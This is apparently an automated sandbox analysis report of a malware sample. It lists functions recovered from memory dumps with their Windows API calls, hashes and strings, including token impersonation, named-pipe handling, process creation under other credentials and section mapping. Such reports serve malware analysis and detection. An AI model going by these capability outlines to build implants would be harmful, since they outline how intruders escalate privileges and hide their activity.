                            • Instruction Fuzzy Hash: 4B51D231A01205EFCF21BF69884499FBBB5EF50320F688629F865921D1EB719E50EF70
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$_rand
                            • String ID:
                            • API String ID: 2453798774-0
                            • Opcode ID: ddbd3a025a0aec4532e33c5aeeeb488dbb3b77c694aae14c4e3775a50cde72ac
                            • Instruction ID: 48f1638fba5cd8126a5620e3ed3a3dea5bc71901ee1a20f26c32138a44974cba
                            • Opcode Fuzzy Hash: ddbd3a025a0aec4532e33c5aeeeb488dbb3b77c694aae14c4e3775a50cde72ac
                            • Instruction Fuzzy Hash: AC510571A00206EFDB019F78DC55FEE7BA9DF56340F184059F885A7252EA34DE0587B4
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$_rand
                            • String ID:
                            • API String ID: 2453798774-0
                            • Opcode ID: 6ef6dc6e4bcd2de23ed2e467e773a6f8dc8f9ebbd22941a16d6cb0498434510d
                            • Instruction ID: 48f1638fba5cd8126a5620e3ed3a3dea5bc71901ee1a20f26c32138a44974cba
                            • Opcode Fuzzy Hash: 6ef6dc6e4bcd2de23ed2e467e773a6f8dc8f9ebbd22941a16d6cb0498434510d
                            • Instruction Fuzzy Hash: AC510571A00206EFDB019F78DC55FEE7BA9DF56340F184059F885A7252EA34DE0587B4
                            APIs
                            • _memset.LIBCMT ref: 00DB489E
                            • _memset.LIBCMT ref: 00DB48BA
                            • CreateProcessWithTokenW.ADVAPI32(00000002,00000000,?,C0330CC4,00000000,?,C3E8296A,83FFFFDB), ref: 00DB4946
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$CreateProcessTokenWith
                            • String ID: sysnative$system32
                            • API String ID: 355399865-2461298002
                            • Opcode ID: a560f8e5821ace479ef37426065189df40f2b418246d9fcabc41abe21ba2d823
                            • Instruction ID: 098e20b5ccb69cc2b6a406492823cce3200a500d3df74ee8084aff5b8ff6f814
                            • Opcode Fuzzy Hash: a560f8e5821ace479ef37426065189df40f2b418246d9fcabc41abe21ba2d823
                            • Instruction Fuzzy Hash: E951D372604345EFD721EF64DC85EEB77E9EF85314F14082AE58AC7212EA31D9088B75
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$_rand
                            • String ID:
                            • API String ID: 2453798774-0
                            • Opcode ID: 75c1d89bc45a6c8dcb5618c688f5539780bfa6badbf1ba624bde91fa96b31e63
                            • Instruction ID: 513a486bd70f2b1d451d8c1a38fe9fc064ac70ac17782564ff7c56bab81d88ca
                            • Opcode Fuzzy Hash: 75c1d89bc45a6c8dcb5618c688f5539780bfa6badbf1ba624bde91fa96b31e63
                            • Instruction Fuzzy Hash: 7A513930A00505AFDB01AFB89C45BEE7BA9DF16300F188094F884AB256EA70DE05CB74
                            APIs
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00100000,00000000), ref: 00DB79DF
                            • GetLastError.KERNEL32 ref: 00DB79EC
                            • WaitNamedPipeA.KERNEL32(?,00002710), ref: 00DB7A01
                            • Sleep.KERNEL32(000003E8), ref: 00DB7A0E
                            • SetNamedPipeHandleState.KERNEL32(?,?,00000000,00000000), ref: 00DB7A58
                            • GetLastError.KERNEL32 ref: 00DB7A62
                            • DisconnectNamedPipe.KERNEL32(?), ref: 00DB7A9C
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$ErrorLast$CreateDisconnectFileHandleSleepStateWait
                            • String ID:
                            • API String ID: 3284586969-0
                            • Opcode ID: e8d41e175776ac855918c3e71b9abf45a6f7486e17e9dc2388c0ed026aa108f1
                            • Instruction ID: a2a5aab4758796897123a698e6082dd1bf037c42d6964077f211c45f32ba0aad
                            • Opcode Fuzzy Hash: e8d41e175776ac855918c3e71b9abf45a6f7486e17e9dc2388c0ed026aa108f1
                            • Instruction Fuzzy Hash: A021B531608309EBEB516BB49C86BFE379DAB85724F210427F61BE61D1EB605A404671
                            APIs
                            • GetLastError.KERNEL32 ref: 00DBE68B
                            • OpenProcessToken.ADVAPI32(00000000,?,00000000), ref: 00DBE6A9
                            • GetLastError.KERNEL32 ref: 00DBE6B3
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast$OpenProcessToken
                            • String ID:
                            • API String ID: 2009710997-0
                            • Opcode ID: 6fbe1575a54590432f7ee40c603fd5158cfa334ee633d133c71ad9e7b45f224a
                            • Instruction ID: 34c7e974e89abebbf36e65a4a102aac7107a495200368bd2e52ff0d36858832b
                            • Opcode Fuzzy Hash: 6fbe1575a54590432f7ee40c603fd5158cfa334ee633d133c71ad9e7b45f224a
                            • Instruction Fuzzy Hash: C5218E72A50309FBEB102BE0DC4EFFE776DEB14759F180029B606D6190EB748D0096B1
                            APIs
                            • _memset.LIBCMT ref: 00DB5FC6
                            • _memset.LIBCMT ref: 00DB5FD2
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60C4
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60CF
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60DB
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60E6
                              • Part of subcall function 00DB6072: _rand.LIBCMT ref: 00DB6144
                            • __snprintf.LIBCMT ref: 00DB602E
                            • _memset.LIBCMT ref: 00DB604C
                            • _memset.LIBCMT ref: 00DB6057
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$__snprintf_rand
                            • String ID: %s%s
                            • API String ID: 4266533377-3438391663
                            • Opcode ID: 840eae8e12f3875ca93af06726ae2f410766420f8e9aef90cd287846aa97c82c
                            • Instruction ID: b454588293460d174e4f099a11e37bc4bcd66561a1746f94851ce9b50736d319
                            • Opcode Fuzzy Hash: 840eae8e12f3875ca93af06726ae2f410766420f8e9aef90cd287846aa97c82c
                            • Instruction Fuzzy Hash: DD21AE31900100BBCF25AE15DC46F9F3B75EF95710F244085FD016B256E675EE21CAB1
                            APIs
                            • _memset.LIBCMT ref: 00DB5FC6
                            • _memset.LIBCMT ref: 00DB5FD2
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60C4
                              • Part of subcall function 00DB6072: _malloc.LIBCMT ref: 00DB60CF
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60DB
                              • Part of subcall function 00DB6072: _memset.LIBCMT ref: 00DB60E6
                              • Part of subcall function 00DB6072: _rand.LIBCMT ref: 00DB6144
                            • __snprintf.LIBCMT ref: 00DB602E
                            • _memset.LIBCMT ref: 00DB604C
                            • _memset.LIBCMT ref: 00DB6057
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$_malloc$__snprintf_rand
                            • String ID: %s%s
                            • API String ID: 4266533377-3438391663
                            • Opcode ID: d53b5cc60179d2f652661f9f5a6de1474bcf4f2c63c9259dd3fe06b4a266d57e
                            • Instruction ID: b454588293460d174e4f099a11e37bc4bcd66561a1746f94851ce9b50736d319
                            • Opcode Fuzzy Hash: d53b5cc60179d2f652661f9f5a6de1474bcf4f2c63c9259dd3fe06b4a266d57e
                            • Instruction Fuzzy Hash: DD21AE31900100BBCF25AE15DC46F9F3B75EF95710F244085FD016B256E675EE21CAB1
                            APIs
                            • GetTickCount.KERNEL32 ref: 00DB7C57
                            • ioctlsocket.WS2_32(?,8004667E(FIONBIO),?), ref: 00DB7C7B
                            • GetTickCount.KERNEL32 ref: 00DB7CB2
                            • ioctlsocket.WS2_32(00000000,8004667E(FIONBIO),00000000), ref: 00DB7CD7
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CountTickioctlsocket
                            • String ID:
                            • API String ID: 3686034022-0
                            • Opcode ID: 37490001e58b4895959c8f2fc0511d7968f5e7eeccef77e4e254016b041475c8
                            • Instruction ID: bac6c89a52cb10e2f868b4cacc9cd6ee8ac9a65073feb511b7528ff2c0c0a44e
                            • Opcode Fuzzy Hash: 37490001e58b4895959c8f2fc0511d7968f5e7eeccef77e4e254016b041475c8
                            • Instruction Fuzzy Hash: C0119131514209FBDB008FA1DC44BEC7FA8EB80379F11801AF516D6290D7B4D9848BB5
                            APIs
                            • _memset.LIBCMT ref: 00DB412F
                            • GetLastError.KERNEL32 ref: 00DB4142
                            • ReadFile.KERNEL32(?,00000001,?,00000000), ref: 00DB4170
                            • ImpersonateNamedPipeClient.ADVAPI32 ref: 00DB4180
                            • GetCurrentThread.KERNEL32 ref: 00DB4195
                            • OpenThreadToken.ADVAPI32(00000000), ref: 00DB419C
                            • DisconnectNamedPipe.KERNEL32(00DE6024), ref: 00DB41B0
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipeThread$ClientCurrentDisconnectErrorFileImpersonateLastOpenReadToken_memset
                            • String ID:
                            • API String ID: 1184232734-0
                            • Opcode ID: 680c7e651cc8fd6ea3a1ac9cce9a0873b90cd3151b74d8effa42d0db4e61c554
                            • Instruction ID: 4b5303286dd64bd385b8a34699749d68763600282d5cbec9c467a9649f6611cd
                            • Opcode Fuzzy Hash: 680c7e651cc8fd6ea3a1ac9cce9a0873b90cd3151b74d8effa42d0db4e61c554
                            • Instruction Fuzzy Hash: 9D117031A41359EFDB10AF64ED85AAA3BBCEB14799F044022F606D6263DB30CD449B70
                            APIs
                            • _malloc.LIBCMT ref: 00DBEC76
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _malloc.LIBCMT ref: 00DBEC83
                            • _malloc.LIBCMT ref: 00DBEC9E
                            • __snprintf.LIBCMT ref: 00DBECB1
                            • _malloc.LIBCMT ref: 00DBECD0
                            Strings
                            • HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d, xrefs: 00DBECA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$AllocateHeap__snprintf
                            • String ID: HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: %d
                            • API String ID: 3929630252-2739389480
                            • Opcode ID: 409e92a814367b8a44f2dd3cf8f0d5ff9fba6d53ced56c44a2b28af9f2822140
                            • Instruction ID: 051b612018fe3267caa4b3f4cc85ef2a6e6693f8a0591b3780b8db4d887ed6de
                            • Opcode Fuzzy Hash: 409e92a814367b8a44f2dd3cf8f0d5ff9fba6d53ced56c44a2b28af9f2822140
                            • Instruction Fuzzy Hash: 4C016D70900346AED711AF7AC885E96BBE8EF44750B10882DF489C7281EE74D9048BB4
                            APIs
                            • _malloc.LIBCMT ref: 00DB8E75
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • htonl.WS2_32(?), ref: 00DB8EA1
                            • recvfrom.WS2_32(00000000,?,000FFFFC,00000000,?,?), ref: 00DB8ED0
                            • WSAGetLastError.WS2_32 ref: 00DB8EDB
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
                            • String ID:
                            • API String ID: 987280018-0
                            • Opcode ID: 4943e5c7a7a6126ce8bb536adaecf4282858c5e75b959dc0af752a475ff7b00c
                            • Instruction ID: c7929eb3038dc7345d2fd64529fbf0c49abd800aa3799337ea435c9cee567cc6
                            • Opcode Fuzzy Hash: 4943e5c7a7a6126ce8bb536adaecf4282858c5e75b959dc0af752a475ff7b00c
                            • Instruction Fuzzy Hash: 0241D671800204EFD7209F64DC01BBA7BBEEF48364F14811AF512E32A1DB309944EB74
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastSleep$BuffersDisconnectFileFlushNamedPipe
                            • String ID:
                            • API String ID: 1974096663-0
                            • Opcode ID: 025b19708d78a27d441bb2671cdb6a4e8a64585d7640623aa128e677628c9b55
                            • Instruction ID: 203481af661b36872f218c4ada17c487b8556bc08f153c7260eeea54ebb49ce8
                            • Opcode Fuzzy Hash: 025b19708d78a27d441bb2671cdb6a4e8a64585d7640623aa128e677628c9b55
                            • Instruction Fuzzy Hash: 0C3108B6D00219EBDB01EBA4DC86AEEB7B8EB04714F150066E506E6250DB31AF44DBB1
                            APIs
                            • __time64.LIBCMT ref: 00DBCB28
                              • Part of subcall function 00DC9E8E: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00DBCB2D,00000000,00000080,?,?,?,00DB13F0,?,00000000,00000000,00000000,00000000), ref: 00DC9E99
                              • Part of subcall function 00DC9E8E: __aulldiv.LIBCMT ref: 00DC9EB9
                              • Part of subcall function 00DC8C0A: __getptd.LIBCMT ref: 00DC8C0F
                            • _malloc.LIBCMT ref: 00DBCB71
                            • _memset.LIBCMT ref: 00DBCB8F
                            • _strtok.LIBCMT ref: 00DBCBB4
                            • _strtok.LIBCMT ref: 00DBCBD7
                            • _strtok.LIBCMT ref: 00DBCBE6
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strtok$Time$FileSystem__aulldiv__getptd__time64_malloc_memset
                            • String ID:
                            • API String ID: 3072773955-0
                            • Opcode ID: d453ffc350d39557901464439530faad7ce2d124d2d95a94970e1976643b44e8
                            • Instruction ID: 3182926ddb897a38bf03a84c4be00b3b8b6d0f680a5de58a4967242e6185536b
                            • Opcode Fuzzy Hash: d453ffc350d39557901464439530faad7ce2d124d2d95a94970e1976643b44e8
                            • Instruction Fuzzy Hash: 8521A0B1504705AFD719DF38D886EFB7BE9EB05354B00042DF89AC7241EA31E9098B75
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _strtok$__aulldiv__getptd__time64_malloc_memset
                            • String ID:
                            • API String ID: 512601900-0
                            • Opcode ID: 48720511a30ea9561bc50dee288fc5aadba22df75b4c1b9df4666e77f59b8890
                            • Instruction ID: 2d4d1a311c9f58b4c460af336a4a6a61fa8c15b1a6fae911566a4cd533c52568
                            • Opcode Fuzzy Hash: 48720511a30ea9561bc50dee288fc5aadba22df75b4c1b9df4666e77f59b8890
                            • Instruction Fuzzy Hash: 8F21D2B51047056FD719EF38D896AB7B7E9EF05710B00442EF89AC7241EB31E8058B71
                            APIs
                            • GetLastError.KERNEL32 ref: 00DB951B
                            • UpdateProcThreadAttribute.KERNEL32(?,00000000,00020000,?,00000004,00000000,00000000), ref: 00DB9549
                            • GetLastError.KERNEL32 ref: 00DB9553
                            • GetCurrentProcess.KERNEL32(00000000,00000000,?), ref: 00DB9588
                            • GetCurrentProcess.KERNEL32(00000000,?,?), ref: 00DB95AA
                            • GetCurrentProcess.KERNEL32(?,?,?), ref: 00DB95C3
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_db0000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$ErrorLast$AttributeProcThreadUpdate
                            • String ID:
                            • API String ID: 1014270282-0
                            • Opcode ID: 3acba6e7910b979eac7d9ad6a5a76469889a1c6d24a557577db3b0499bf93150
                            • Instruction ID: 6f983b5b9b4c613e8e8b06d7b9c6411864d530be2fb46cbd79f42d1337a3a51e
                            • Opcode Fuzzy Hash: 3acba6e7910b979eac7d9ad6a5a76469889a1c6d24a557577db3b0499bf93150
                            • Instruction Fuzzy Hash: 4B213BB6644345FFEB25AFB49C5ADAA77BDEB08354B14081DBA07C2241EA70E9108630
                            APIs
                            • _memset.LIBCMT ref: 00D752FC
                            • _memset.LIBCMT ref: 00D75308
                              • Part of subcall function 00D75472: _malloc.LIBCMT ref: 00D754C4
                              • Part of subcall function 00D75472: _malloc.LIBCMT ref: 00D754CF
                              • Part of subcall function 00D75472: _memset.LIBCMT ref: 00D754DB
                              • Part of subcall function 00D75472: _memset.LIBCMT ref: 00D754E6
                              • Part of subcall function 00D75472: _rand.LIBCMT ref: 00D75544
                            • __snprintf.LIBCMT ref: 00D75359
                            • __snprintf.LIBCMT ref: 00D75371
                            • _memset.LIBCMT ref: 00D75390
                            • _memset.LIBCMT ref: 00D7539B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _memset$__snprintf_malloc$_rand
                            • String ID:
                            • API String ID: 1876596931-0
                            • Opcode ID: e9ed54a4a77dd13d35101f88d34e502c55548b4bb63c99b13df0d58da31436f4
                            • Instruction ID: 725fd23e788a829c402276a8450ca6f1e775ae81624473a41dd206a5f7a64cd3
                            • Opcode Fuzzy Hash: e9ed54a4a77dd13d35101f88d34e502c55548b4bb63c99b13df0d58da31436f4
                            • Instruction Fuzzy Hash: E1213871900100BBDF19AF14DC82F5B3A69EF95750F288094FD046B2A6E6B1ED21CBB5
                            APIs
                            • GetLastError.KERNEL32(?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB71EC
                            • WaitNamedPipeA.KERNEL32(00DB37B2,00002710), ref: 00DB7201
                            • CreateFileA.KERNEL32(00DB37B2,C0000000,00000000,00000000,00000003,00000000,00000000,74DF23A0,-0000EA60,?,?,?,00DB72A9,00DB37B2,00000000), ref: 00DB7219
                            • SetNamedPipeHandleState.KERNEL32(?,00DB37B2,00000000,00000000,?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB722F
                            • DisconnectNamedPipe.KERNEL32(?,?,00DB72A9,00DB37B2,00000000,?,00DB37B2,?), ref: 00DB723B
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: NamedPipe$CreateDisconnectErrorFileHandleLastStateWait
                            • String ID:
                            • API String ID: 927366879-0
                            • Opcode ID: 12909c5420fcdafc485a1b38c53e1d7588b9f05aea3928dc37c0d276ea22c319
                            • Instruction ID: 5d879dbda8bca38238056e8fd721918c3aea5e2bb28941ac8e71e6d78aef1717
                            • Opcode Fuzzy Hash: 12909c5420fcdafc485a1b38c53e1d7588b9f05aea3928dc37c0d276ea22c319
                            • Instruction Fuzzy Hash: 93115E71218214FFEB105B64DC09FBB3BADEF86715F10056BF916D61A0E7709D408A75
                            APIs
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81C2
                              • Part of subcall function 00DB81BC: _malloc.LIBCMT ref: 00DB81D2
                            • _memset.LIBCMT ref: 00DB4BDD
                            • GetStartupInfoA.KERNEL32(?), ref: 00DB4BF5
                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000001,00000000,00000000,00000000,00000000,00000000,?,00DB32CF), ref: 00DB4C8F
                            • GetLastError.KERNEL32 ref: 00DB4C9E
                              • Part of subcall function 00DB26E2: _vswprintf_s.LIBCMT ref: 00DB26FE
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: _malloc$CreateErrorInfoLastLogonProcessStartupWith_memset_vswprintf_s
                            • String ID: %s as %s\%s: %d
                            • API String ID: 709525413-816037529
                            • Opcode ID: c596897c02fba1d8616f7f351f8061e9721a8c8fe42293f6402d3ecdafc7190b
                            • Instruction ID: a3b4c1fca304884cd97fce5b0d836c5f3b7b681356d920752c3091cc7269ca03
                            • Opcode Fuzzy Hash: c596897c02fba1d8616f7f351f8061e9721a8c8fe42293f6402d3ecdafc7190b
                            • Instruction Fuzzy Hash: E3413471D00209BADF01AFA9DC85EEFBFB9EF89750F10401AF605A6261DB718A10DB71
                            APIs
                            • htonl.WS2_32(00000000), ref: 00DB3982
                            • htonl.WS2_32(?), ref: 00DB398D
                            • _malloc.LIBCMT ref: 00DB39A4
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00DD181E,00000000,00000001,00000000,?,00DCA834,00000018,00DE3700,0000000C,00DCA8C5), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DB39FD
                              • Part of subcall function 00DBC0FD: __snprintf.LIBCMT ref: 00DBC13C
                              • Part of subcall function 00DBC0FD: __snprintf.LIBCMT ref: 00DBC14E
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
                            • String ID: zyxwvutsrqponmlk
                            • API String ID: 1734027086-3884694604
                            • Opcode ID: 514e3753d2bd9c259749d215b49606ed3ef850e240ef56736913425497327ee4
                            • Instruction ID: 67a24d2acceda025e2f6b3b31f1d1a98e1ff00740470014dce36a706beb22cfe
                            • Opcode Fuzzy Hash: 514e3753d2bd9c259749d215b49606ed3ef850e240ef56736913425497327ee4
                            • Instruction Fuzzy Hash: EC21F862E00611F6DB207AB59C82BEF7AA8EF45320F240169F947B7283E9658A0156B5
                            APIs
                            • htonl.WS2_32(00000000), ref: 00DB3982
                            • htonl.WS2_32(?), ref: 00DB398D
                            • _malloc.LIBCMT ref: 00DB39A4
                              • Part of subcall function 00DC87FF: __FF_MSGBANNER.LIBCMT ref: 00DC8822
                              • Part of subcall function 00DC87FF: __NMSG_WRITE.LIBCMT ref: 00DC8829
                              • Part of subcall function 00DC87FF: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,00DEFFA0,?,00DB106E,00004008,?,?,?,?,00000003,?,70207369), ref: 00DC8876
                            • _memset.LIBCMT ref: 00DB39FD
                              • Part of subcall function 00DBC0FD: __snprintf.LIBCMT ref: 00DBC13C
                              • Part of subcall function 00DBC0FD: __snprintf.LIBCMT ref: 00DBC14E
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00D70000, based on PE: true
                            • Associated: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: __snprintfhtonl$AllocateHeap_malloc_memset
                            • String ID: zyxwvutsrqponmlk
                            • API String ID: 1734027086-3884694604
                            • Opcode ID: ad366776143dd28f26c6a46f52a6100db2ff96930d8d0fef39d2a1d0d8ceeea0
                            • Instruction ID: 67a24d2acceda025e2f6b3b31f1d1a98e1ff00740470014dce36a706beb22cfe
                            • Opcode Fuzzy Hash: ad366776143dd28f26c6a46f52a6100db2ff96930d8d0fef39d2a1d0d8ceeea0
                            • Instruction Fuzzy Hash: EC21F862E00611F6DB207AB59C82BEF7AA8EF45320F240169F947B7283E9658A0156B5
                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,NtMapViewOfSection,00000000,?,00000000,00DB65ED,00000000,00000000,00000000), ref: 00DB693C
                            • GetProcAddress.KERNEL32(00000000), ref: 00DB6943
                            • GetLastError.KERNEL32 ref: 00DB69B6
                              • Part of subcall function 00DBD9B2: GetCurrentProcess.KERNEL32(000F003F,00000000,00000000,?,00000000,00000001,00000000,D78B5955,00000000,?,?,00DB1FCE,00000000,000F003F,?,00000000), ref: 00DBDA21
                              • Part of subcall function 00DBDA6F: GetCurrentProcess.KERNEL32(00000080,?,00DB1D9E,?,00000000,00000000,00000001,?,?,00DBDE6B,00000000,00000001,00000000,00000000,00000080,00DB16C4), ref: 00DBDAAF
                            Memory Dump Source
                            • Source File: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00DB0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d70000_12.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentProcess$AddressErrorHandleLastModuleProc
                            • String ID: NtMapViewOfSection$ntdll.dll
                            • API String ID: 1006775078-3170647572
